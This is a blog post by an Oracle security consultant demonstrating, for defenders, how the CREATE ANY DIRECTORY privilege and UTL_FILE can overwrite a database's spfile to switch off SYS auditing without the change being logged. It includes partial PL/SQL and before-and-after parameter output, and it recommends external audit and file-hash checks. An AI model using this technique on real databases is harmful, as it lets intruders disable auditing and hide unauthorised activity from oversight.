Three Tier Oracle Security in London ~ Paul M. Wright

(nix, oracle, java, www, cloud ) intersect (safety, security, reliability, integrity)

Three Tier Oracle Security in London ~ Paul M. Wright RSS Feed
 

Turning off SYS auditing from the DB without that fact being recorded

Hello World,

Thanks to the many folks that attended the Sentrigo Webinar a few hours ago.
Marketing had a few problems with the GoToWebinar software which were solved by excellent team work, Dunkirk Spirit and a sense of humour ~ but did result in my being unable to show this demo of how CREATE ANY DIRECTORY privilege can be used to turn off SYS auditing ~ without the act of turning off the audit being recorded in the audit trail itself. This is why shutdowns and startups as part of mandatory audit are important for security folks to monitor as it may be the only evidence of unauthorised actions having taken place. It is also why using DAMS to enhance Oracle audit is a must for high security organisations (Note: Don’t forget to backup your spfile before you do this test).

SQL> sho parameter audit

NAME TYPE VALUE
———————————— ———– ——————————
audit_file_dest string /u01/app/oracle/admin/orcl/adump
audit_sys_operations boolean TRUE
audit_syslog_level string LOCAL1.INFO
audit_trail string DB

CREATE DIRECTORY DIR2 AS ‘/u01/app/oracle/product/11.2.0/db_1/dbs’;

DECLARE fi UTL_FILE.FILE_TYPE;
bu RAW(32767);
bu2 varchar2(32767);
bu3 varchar2(32767);
bu4 varchar2(32767);
bu5 varchar2(32767);
bu6 varchar2(32767);
BEGIN
bu2:=hextoraw(’4322000001000000000000000000000000000000000000000000000000000000000014300′);

- – - 8< - - - SNIPPED FOR READABILITY.. SEE SCRIPT LINK AT END OF POSTING - - - 8< - - -
--
bu := hextoraw(bu2||bu3||bu4||bu5||bu6);
fi:=UTL_FILE.fopen('DIR2','spfileDB11G.ora','w',32767);
UTL_FILE.put_raw(fi,bu,TRUE);
UTL_FILE.fclose(fi);
END;
/

shutdown immediate
startup

SQL> sho parameter audit

NAME TYPE VALUE
———————————— ———– ——————————
audit_file_dest string /u01/app/oracle/admin/orcl/adump
audit_sys_operations boolean FALSE
audit_syslog_level string
audit_trail string DB

The above is a simple demo which arose from a recent conversation with Pete, and is a good reminder of why audit that is external to Oracle’s DB processes is important ~ plus reinforces the need to prevent DB users from accessing the OS. There are quite a few methods as described here http://www.red-database-security.com/tutorial/tutorials.html

The above demo is very similar to the CREATE ANY DIRECTORY paper I wrote a couple of years ago now. The point being that these critically important configuration files are not state checked ~ only the size of the file is verified. Good idea to record and verify sha1sum of these files over time .

The Powerpoint slides from today’s presentation are here.

Thanks again to all those concerned in the presentation today. If your organisation is interested in Oracle Security and/or DAMS you can contact me confidentially to discuss this at paulmwright@oraclesecurity.com . Here is the complete and fully tested script for the above demo (The code works well on 11.2 RHE5-64).

Cheers,
Paul

Leave a Reply

You must be logged in to post a comment.